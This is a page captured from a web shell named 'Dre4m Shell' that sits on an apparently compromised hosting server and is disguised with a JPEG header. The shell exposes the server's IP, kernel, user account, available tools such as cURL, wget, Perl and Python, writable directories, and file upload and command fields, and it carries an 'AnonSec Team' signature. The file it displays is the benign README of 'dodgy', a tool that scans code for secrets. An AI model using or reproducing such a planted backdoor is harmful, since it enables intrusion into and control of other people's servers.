ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.110
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/alt/python37/share/doc/alt-python37-dodgy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /opt/alt/python37/share/doc/alt-python37-dodgy/README.md
dodgy
=====

Dodgy is a very basic tool to run against your codebase to search for "dodgy" looking values. It is a series of simple regular expressions designed to detect things such as accidental SCM diff checkins, or passwords or secret keys hard coded into files.

While this is primarily aimed at open source projects (for whom a publicly available secret key is pretty dangerous), it can also be used in private projects, with the caveat that it will point out things which are not a problem for private projects and is not configurable enough currently to change that.

Another note - this tool is probably best run pre-commit, since it will hopefully prevent dodgy things being checked in.


Status
---

[![Latest Version](https://pypip.in/v/dodgy/badge.png)](https://crate.io/packages/dodgy)
[![Build Status](https://travis-ci.org/landscapeio/dodgy.png?branch=master)](https://travis-ci.org/landscapeio/dodgy) 
[![Code Health](https://landscape.io/github/landscapeio/dodgy/master/landscape.png)](https://landscape.io/github/landscapeio/dodgy/master)
[![Coverage Status](https://coveralls.io/repos/landscapeio/dodgy/badge.png)](https://coveralls.io/r/landscapeio/dodgy)

This is a very early version with minimal functionality right now, but will be improved over time. 

It was written as one of several tools for [landscape.io](https://landscape.io), a code metrics and repository analyser for Python. As such, the features will mostly reflect the needs of Landscape in the early stages.

Anon7 - 2022
AnonSec Team